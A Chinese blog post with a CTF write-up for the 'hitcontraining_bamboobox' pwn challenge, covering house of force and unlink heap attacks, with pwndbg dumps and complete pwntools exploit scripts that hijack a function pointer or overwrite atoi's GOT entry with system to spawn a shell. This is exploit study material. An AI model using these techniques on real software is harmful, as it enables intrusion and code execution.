hitcontraining_bamboobox

最新推荐文章于 2023-09-14 20:43:20 发布
最新推荐文章于 2023-09-14 20:43:20 发布
阅读量693 收藏 3
点赞数 1
分类专栏: CTF 文章标签: buu bamboobox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/116106777
版权

hitcontraining_bamboobox这道题有两种解题方式:

  1. house of force

    参考:house of force

  2. unlink

house of force(详解)

知识点

只要top chunk size够大,就能随意申请chunk

所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数)

题目流程

程序一开始申请0x10的块,存放hello_message和goodbye_message的指针,而且最后在功能5中会调用goodbye_message。
在这里插入图片描述在这里插入图片描述

所以,可以通过house of force修改top chunk size,然后将top chunk申请到v3里,修改v3的指针为后门函数magic的地址,然后即可get flag。

详细过程

1.申请一个chunk

为了不跟v3的大小0x10撞,选择0x30的大小。

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x1a89000
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0x1a89020
Size: 0x41

Top chunk | PREV_INUSE
Addr: 0x1a89060
Size: 0x20fa1

pwndbg> x/30gx 0x1a89000
0x1a89000:	0x0000000000000000	0x0000000000000021#v3
0x1a89010:	0x0000000000400896	0x00000000004008b1#hello_message、goodbye_message
0x1a89020:	0x0000000000000000	0x0000000000000041#申请的chunk
0x1a89030:	0x0000000a61616161	0x0000000000000000
0x1a89040:	0x0000000000000000	0x0000000000000000
0x1a89050:	0x0000000000000000	0x0000000000000000
0x1a89060:	0x0000000000000000	0x0000000000020fa1#top chunk size
0x1a89070:	0x0000000000000000	0x0000000000000000
0x1a89080:	0x0000000000000000	0x0000000000000000

2.堆溢出修改top chunk

手动输入新top chunk为最大值0xffffffffffffffff(本质就是-1,但好像直接-1不太好使,,,)

Allocated chunk | PREV_INUSE
Addr: 0xc32000
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0xc32020
Size: 0x41

Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0xc32060
Size: 0x-1	#成功修改为-1

pwndbg> x/30gx 0xc32000
0xc32000:	0x0000000000000000	0x0000000000000021	#v3(目的地址)
0xc32010:	0x0000000000400896	0x00000000004008b1
0xc32020:	0x0000000000000000	0x0000000000000041
0xc32030:	0x6161616161616161	0x6161616161616161
0xc32040:	0x6161616161616161	0x6161616161616161
0xc32050:	0x6161616161616161	0x6161616161616161
0xc32060:	0x0000000000000000	0xffffffffffffffff	#chunk
0xc32070:	0x0000000000000000	0x0000000000000000
3.向上申请到v3的地址

向上申请块,需要malloc(负数),负数 = 0xc32000 - 0xc32060 - 0x10 = -0x70(-112)

pwndbg> heap
Top chunk | PREV_INUSE
Addr: 0xeae000	#成功修改chunk的位置
Size: 0x59

pwndbg> x/30gx 0xeae000
0xeae000:	0x0000000000000000	0x0000000000000059#目的地址
0xeae010:	0x0000000000400896	0x00000000004008b1
0xeae020:	0x0000000000000000	0x0000000000000041
0xeae030:	0x6161616161616161	0x6161616161616161
0xeae040:	0x6161616161616161	0x6161616161616161
0xeae050:	0x6161616161616161	0x6161616161616161
0xeae060:	0x0000000000000000	0x00ffffffffffffa1
0xeae070:	0x0000000000000000	0x0000000000000000
4.申请一个块,填入内容magic
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x2034000
Size: 0x21

Top chunk | PREV_INUSE
Addr: 0x2034020
Size: 0x39

pwndbg> x/30gx 0x2034000
0x2034000:	0x0000000000000000	0x0000000000000021
0x2034010:	0x0000000000400d49	0x0000000000400d49	#修改成功
0x2034020:	0x0000000000000000	0x0000000000000039
0x2034030:	0x6161616161616161	0x6161616161616161
0x2034040:	0x6161616161616161	0x6161616161616161
0x2034050:	0x6161616161616161	0x6161616161616161
0x2034060:	0x0000000000000000	0x00ffffffffffffa1
0x2034070:	0x0000000000000000	0x0000000000000000
执行功能5

也就是会v3[1](),v3[1]的地址已经被修改为magic的地址,故将执行后门函数magic()

[DEBUG] Received 0xe bytes:
    'flag{good_job}'
flag{good_job}[*] Got EOF while reading in interactive

完整exp

from pwn import *
p = process('./bamboobox')
context.log_level = 'debug'

magic = 0x00400D49 

def show():
    p.recvuntil("Your choice:")
    p.sendline(str(1))

def alloc(size,content):
    p.recvuntil("Your choice:")
    p.sendline(str(2))
    p.recvuntil("length of item name:")
    p.sendline(str(size))
    p.recvuntil("name of item:")
    p.sendline(content)

def change(idx,content):
    p.recvuntil("Your choice:")
    p.sendline(str(3))
    p.recvuntil("index of item:")
    p.sendline(str(idx))
    p.recvuntil("length of item name:")
    p.sendline(str(len(content)))
    p.recvuntil("new name of the item:")
    p.sendline(content)

def free(idx):
    p.recvuntil("Your choice:")
    p.sendline(str(4))
    p.recvuntil("index of item:")
    p.sendline(str(idx))

def exit():
    p.recvuntil("Your choice:")
    p.sendline(str(5))

alloc(0x30,"aaaa")
payload = "a" * 0x30
payload += p64(0) + p64(0xffffffffffffffff)
change(0,payload)
alloc(-112,"aaaa")
alloc(0x10,p64(magic)*2)
exit()
# gdb.attach(p)
# pause()

p.interactive()

unlink

unlink具体已经通过hitcon_2014_stkof详解学习了,但是做本题的时候,遇到了一些问题,,,记录下。

思路比较简单:

  1. unlink
  2. 修改chunk1指针为atoi_got
  3. show打印atoi地址,计算system
  4. edit修改stoi_got为system地址
  5. 重新启动的时候,发送’/bin/sh’即可执行atoi(输入的数据) => system(’/bin/sh’)

未解决的问题

1.target取值问题

target = 0x6020c8可以

pwndbg> x/30gx 0x6020c0
0x6020c0 <itemlist>:	0x0000000000000030	0x00000000006020b0
0x6020d0 <itemlist+16>:	0x0000000000000000	0x0000000000000000
0x6020e0 <itemlist+32>:	0x0000000000000030	0x00000000022e8100
0x6020f0 <itemlist+48>:	0x0000000000000000	0x0000000000000000

但是target = 0x6020c8+0x10会导致整个脚本不可用。

难道是不能最后清零?

2.覆盖指针问题

就很奇怪,不能用puts_got表(0x602020),同样报错,其他的可以,,,

完整exp

from pwn import *
p = process('./bamboobox')
p=remote("node3.buuoj.cn",27073)
context.log_level = 'debug'

elf = ELF("./bamboobox")
libc = ELF("./libc-2.23.so")

atoi_got = elf.got['atoi']

def show():
    p.recvuntil("Your choice:")
    p.sendline(str(1))

def alloc(size,content):
    p.recvuntil("Your choice:")
    p.sendline(str(2))
    p.recvuntil("length of item name:")
    p.sendline(str(size))
    p.recvuntil("name of item:")
    p.sendline(content)

def change(idx,content):
    p.recvuntil("Your choice:")
    p.sendline(str(3))
    p.recvuntil("index of item:")
    p.sendline(str(idx))
    p.recvuntil("length of item name:")
    p.sendline(str(len(content)))
    p.recvuntil("new name of the item:")
    p.sendline(content)

def free(idx):
    p.recvuntil("Your choice:")
    p.sendline(str(4))
    p.recvuntil("index of item:")
    p.sendline(str(idx))

alloc(0x30,"aaaa")
alloc(0x80,"bbbb")
alloc(0x30,"cccc")

target = 0x6020c8   #not be last
fd = target - 0x18
bk = target - 0x10

payload = p64(0) + p64(0x30)
payload += p64(fd) + p64(bk)
payload += "a"*0x10
payload += p64(0x30) + p64(0x90)
change(0,payload)
free(1)
# x/30gx 0x6020c8

payload = p64(0) * 2
# print(hex(puts_got))
payload += p64(0x30) + p64(atoi_got)

change(0,payload)
show()
atoi_addr = u64(p.recvuntil("\x7f")[-6:]+'\x00\x00')
log.success(hex(atoi_addr))

libc_base = atoi_addr - libc.sym['atoi']
system = libc_base + libc.sym['system']

payload = p64(system)
change(0,payload)
p.recvuntil("Your choice:")
p.sendline("/bin/sh\x00")

# gdb.attach(p)
# pause()
p.interactive()

其实这道题比hitcon_2014_stkof详解这道题要简单,,,给了打印函数,可以直接show出来地址(无须构造puts),覆盖atoi方便,因为程序开头有atoi(输入八字节)的操作,只要覆盖atoi_got表为system地址即可get shell。

书文的学习记录本
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 程序如何运行 部分 x86组装 通话约定 实验2-打开/读取/写入 外壳编码 堆栈溢出 缓冲区溢出 返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
bamboobox和unlink
m0_62326489的博客
07-14 145
hhh
Linux下堆溢出利用3-bamboobox解题思路之unlink
haibiandaxia的博客
09-08 617
#coding=utf8 from pwn import * context.log_level = 'debug' context(arch='amd64', os='linux') local = 1 elf = ELF('./bamboobox') if local: p = process('./bamboobox') libc = elf.libc else: p = remote('116.85.48.105',5005) libc = ELF('./libc.
[BUUCTF]PWN——hitcontraining_bamboobox(House of force+unlink)
mcmuyanga的博客
03-02 1221
hitcontraining_bamboobox 附件 步骤 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的执行情况,经典的堆题的菜单,并且根据第一行的提示,估计存在后门 64位ida载入,猜测有后门,检索字符串果真发现了后门,不过根据buu的习性,一般flag在根目录下,这个后门应该用不大上,先记一下magic_addr=0x400d49 main()函数,发现输入5的时候会去执行v4[1],v4[1]里面是goodbye_message的地址,如果后门的
【unlink】hitcontraining_bamboobox
huzai9527的博客
05-13 170
【unlink】hitcontraining_bamboobox 1. ida分析 有存放全局指针的数组,存放格式为itemlist[0]为size,itemlist[1]为指向item的指针 change时没有检测输入长度,存在堆溢出 2.思路 申请3个chunk,编辑chunk0 ,构造fake chunk,溢出到chunk1的size位 free chunk1,unlink后itemlist[1] ->itemlist[-2] 再次编辑chunk0,即编辑item
HITCON-Training-master lab2 wp
zszcr的博客
04-03 655
查看了下防护机制发现开启了Canary,但是没关系,它没开启堆栈不可执行,说明 这是一道shell code题简单跑了一下程序,发现输出了一句话:give me you shellcodeida反编译查看了下代码代码逻辑也很简单,你输入一段shellcode,然后去执行它我随便去网上找了一段shellcode,输入后发现不行,说明它不是单纯的让我们输入shellcode查看了一下orw_secco...
暑假集训——Hitcon_Trainning——lab11_bamboobox——堆unlink
qq_41667316的博客
07-15 413
UNLINK 思路 其实是艰辛的心路历程 这道题是昨天晚上这个时间就想到的思路 [虽然是道基础题但是是难得的一道没看别人exp就想到怎么写的题,当时觉得自己已经登顶了(bushi] 毕竟是一道套路题的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,堆溢出。堆的几个漏洞里面,堆溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
HITCON training lab 11——bamboobox
04-23 543
64位程序  #House Of Force 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 _QWORD *v3; // [rsp+8h] [rbp-18h] 4 char buf; // [rsp+10h] [rbp-10h] 5 ...
HITCON-trainning&寒假做题记录
Peanuts
01-28 651
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
HITCON-Training lab7(一道简单的格式化字符串读漏洞)
像初雪一样自由洒落
03-27 254
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的题目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
hitcontraining_bamboobox的wp
wuyvle的博客
03-16 1147
是个堆题 add函数 change函数 没有判断大小可以进行unlink操作 伪造一个空闲 chunk。 通过 unlink 把 chunk 移到存储 chunk 指针的内存处。 覆盖 chunk 0 指针为 atoi 的 got 表地址并泄露。 覆盖 atoi 的 got 表为 system 函数地址。 给出参数 ‘sh’,调用 atoi 函数拿 shell。 add(0x40,b'a' * 8) add(0x80,b'b' * 8) add(0x80,b'c' * 8) ptr = 0x6020
hitcontraining_uaf
z1r0的博客
12-10 1461
hitcontraining_uaf 查看保护 有uaf,还有后门函数 这里会将show的功能存放在堆里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。 申请两个0x10堆, 释放掉,有uaf,没有清0。 这时再申请一个0x8的堆,因为fastbin,填充content时其实就改的是print_note_content。 content放入magic即可。 from pwn import * context(arc
hitcontraining_playfmt
最新发布
qq_62887641的博客
09-14 84
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串。
HITCON-Training-master lab5 wp
zszcr的博客
04-07 361
程序防护机制:开启了NX堆栈不可执行查看了下ida反编译的代码可以发现主函数十分简单,但是程序里却又十分多的函数,说明这是静态链接编译的程序要求输入一局话,可以发现在read函数处有明显的栈溢出漏洞,buf大小是20 ,但是read函数读取100个字节的数据我一开始是想直接用ROPgadget生成ropchain的,但是尝试过发现,它可以溢出的空间不足以放下ROPgadget生成的ropchain...
HITCON-Training lab5(自己构造rop)
像初雪一样自由洒落
03-12 350
看到静态链接,一顿欣喜,直接ropchain生成,栈溢出找出来就ok啦?然后后来发现并没有那么简单。。。 ================================================================================================ 【一段小插曲】 做题的时候突然很奇怪,nx开启,堆栈不可执行,为什么可以执行pop这些指令...
HITCON-Training lab8(格式化字符串写漏洞)
像初雪一样自由洒落
03-28 319
还在补格式化字符串漏洞的知识,,,,看到这道题的时候,有点懵,,,因为发现218不会整,,,看官方writeup也不太行,,, 先知社区上有篇讲的就很好了,,,nice,用了四种方法(最后一种没看懂,,,),,,看完,BJDCTF那道r2t4终于也明白了,感天动地,,,今天就写下前三种方法的种种,,, 顺便计算下偏移,反正都会用到 偏移是7 方法一 最简单的...
HITCON-training lab10 wp
qq_43409582的博客
01-30 1644
0x00 开始堆利用的学习了,先做第一入门题目,UAF漏洞利用。 0x01 看保护: 一个32位的开了canary和nx保护 0x02 ida分析 一个菜单有加、减、查看功能 看add是什么样子 1-2 .先会malloc一个8字节的空间,指向print_note_content函数,用来打印content。 3-4 .再malloc一个size用来存放你写入的content 再看看del_n...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值